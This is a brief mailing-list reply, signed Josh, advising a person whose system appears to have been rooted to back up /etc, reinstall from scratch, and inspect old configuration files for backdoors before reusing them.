Re: Strange segmentation faults and Zombies

Backup /etc and any other data you have, and you can reference your configuration files later
during your re-install.

At this point, re-installation is a must. Never delude yourself into thinking you can 'recover'
from being rooted. Sure, you might be able to do so after a lot of effort/etc, but then again maybe
you'll forget something and a backdoor will remain. Best bet is to re-install, referencing your
existing configuration files (though I would NOT use them as-is without inspection, since they
could potentially have backdoor'd the configs as well).

Good luck.

Josh